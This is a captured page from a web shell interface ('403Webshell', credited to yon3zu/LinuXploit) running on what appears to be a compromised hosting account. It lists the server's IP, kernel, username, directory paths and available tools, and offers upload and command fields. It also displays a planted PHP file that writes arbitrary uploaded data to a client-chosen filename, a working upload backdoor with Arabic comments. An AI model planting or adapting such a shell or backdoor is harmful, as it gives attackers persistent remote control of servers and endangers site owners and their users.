403Webshell
Server IP : 162.0.215.10  /  Your IP : 18.191.154.32
Web Server : LiteSpeed
System : Linux premium181.web-hosting.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64
User : alfhgysd ( 724)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/alfhgysd/squareone-sa.store/uploads/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/alfhgysd/squareone-sa.store/uploads/1950281424.php
<?php
$target_file = "uploads/".$_FILES["file"]["name"];
$file = fopen($target_file, "w");  // فتح الملف للكتابة

// قراءة البيانات من php://input (دفق البيانات)
$input = fopen("php://input", "r");
while ($data = fread($input, 1024)) {
    fwrite($file, $data);
}
fclose($file);
fclose($input);

echo "تم رفع الملف بنجاح!";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit